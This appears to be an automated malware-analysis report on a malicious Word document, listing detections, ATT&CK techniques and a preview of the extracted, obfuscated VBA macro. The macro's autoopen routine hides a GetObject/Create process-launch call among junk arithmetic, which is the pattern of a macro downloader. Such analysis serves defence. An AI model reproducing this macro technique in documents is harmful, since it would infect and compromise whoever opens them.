Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present, and the macro utilizes a GetObject call, which is a common technique for executing arbitrary code. This strongly suggests the macro is designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics (7)
- ClamAV: Doc.Malware.Drsm-6901412-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Drsm-6901412-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11103 bytes | f2d92057842857ff8622dc9d6fea2b19a244a206715a35e066704db913650582 |

Preview script (first 1,000 lines of the extracted script, macros.bas):
Attribute VB_Name = "Go1CAo1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lDBAQ_"
Attribute VB_Base = "0{5CFBE7FE-3C0C-427C-BA18-7DEA88655D38}{32B2A771-FCFA-466E-A59A-3FCF6C2637D5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ooAAAD"
Sub autoopen()
On Error Resume Next
If FA_C_AcB = RADAwU Then
s_AA_oo = 245338410 - iQCBBA
iDCADwA1 = cBkA_Ao + Oct(jB4Dwk) / 702629890 * 173415240
Set oZXZZB = vDBcAwA
IUAAGUA = (75878024 + 148256650 * lAUAww + CInt(858029941) + EAAUACA / UDGQZQQA)
EUADBQ = 811256994
End If
If cABUkADG = F4CABA Then
ZxCoAkB = 32269438 - UCAA1Z
CCZwQQA = oBAoBD + Oct(iAGU_AD) / 630178915 * 884933102
Set z1AA1AoA = ZACoBQ
QBBoAUGG = (955733607 + 581752558 * fGAkAc_ + CInt(132425903) + wAADDUUB / hABUwAA)
jC1k4AAX = 843319646
End If
Set ZxQBAoAD = GetObject(lDBAQ_.DAZZA1U)
If Yw4AAo = QBBAA_A Then
AABQADD = 401129167 - iAADAGA
UQBkAD = cGoB1AA4 + Oct(jkAAw_) / 252883297 * 588297443
Set YAA_xDwA = EXG1AA
TGUAQD = (109076475 + 311048983 * QDBAAQ + CInt(339728891) + VQXAA_1 / Xo_Z_XX)
l1QDUx = 96870468
End If
If ooUcDA1 = cAAAG4A Then
Q11BAx = 943031418 - KAD1CA
qw1Zw4A = wcAAAG + Oct(cQAwBUAA) / 49813801 * 101404809
Set MQUxwQD = FGBAUDc
UA1BUAU = (231597638 + 985767395 * DAZZAD + CInt(143346346) + VA4wwA / Uk4DxUU)
iUo1cA = 564654150
End If
ZxQBAoAD.ShowWindow = IAZACUAw + 219371 - 219371 + EDcCkB
If zAkD1G = jcBDAA Then
iA11_Q_ = 155385601 - uQkQkB
tZQAxAcw = T4QACDwA + Oct(jwocwk) / 785540370 * 815622432
Set rADDQ_ = lCAwBQ
hABA1DA = (509055555 + 213488197 * dAABAAQ + CInt(70726603) + YC_kAA / VDDXU_AC)
n_BokoDA = 807704741
End If
If WA1GAA = sZkAAB Then
jDxUB4 = 511231273 - NoUCwAc
qoUABAQ = wXQUBAA + Oct(bC1B1G) / 313150315 * 487760591
Set GAAkAD = jAQkXAXB
dAAAAk_G = (138191173 + 985201051 * RDAA1QQA + CInt(115074319) + zXAUAQoA / aAA1cA)
owx1AUU = 56513609
End If
If cCDwAX = iAkDAQA Then
mDADZ41 = 517363291 - RAwBUAU
dAAw4A = EAB_BA + Oct(LwoAAAU) / 723631859 * 540851613
Set X1U_Ak = zUAG_AAw
KQA_UZ = (668964842 + 828471514 * aU4GDUAB + CInt(686443008) + QQDAAD / uoBxZDZ)
vAQAQAwA = 780961912
End If
GetObject(lDBAQ_.DA4GUU_A).Create E_kAXXUC + lDBAQ_.i4QBZQUB + j4A1ADD_ + lDBAQ_.DxAAcAA_ + YAAXA4 + lDBAQ_.LAZCCcxQ + oAZAAQ1, WAAQA_, ZxQBAoAD, MAA4cAD_
If jAAAoUxD = HAGAAZ Then
qUBoAAwU = 69231695 - n_1UoZ
nBDAGB1 = iQAAADxx + Oct(rAkAAADB) / 599226776 * 871705289
Set hAA4DAcA = EAkQkDA
UAQD1A = (690376587 + 46809016 * zGQUAAw + CInt(742788825) + ixDA1w / pAUUZA)
tAACUU = 508166534
End If
If ZXoDDA_4 = RUAxQ44A Then
uDCAGA = 327825209 - sADUAB
i_ABAAC4 = TcAGGC + Oct(TwAG_ZQ_) / 914555056 * 287366571
Set EA_UCDGA = zkx_CUZX
TUXDQc = (2544298 + 934582326 * ZGAGACQC + CInt(749826888) + AwUwxG / EcAQk4U)
zCDAABX = 326205048
End If
If iG4cZD = tAAUkDc Then
nUQXBQ = 175028555 - wAAABCA
AB14ZA = jZD_cAAD + Oct(HxkAAQ) / 959812514 * 98964883
Set bUDAUCc = IXAGUAGA
WcwoA4Ax = (116163784 + 123883849 * VcDACAA + CInt(67026043) + b1QBAAUA / tkAA1A)
iABUAQ = 780399674
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/df02ca4d72a84090bdbd1b499fa49f12.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Go1CAo1 - 1105 bytes
' Macros/VBA/lDBAQ_ - 1156 bytes
' Macros/VBA/ooAAAD - 5665 bytes
' Line #0:
' FuncDefn (Sub ooAAAD())
' Line #1:
'
... (truncated)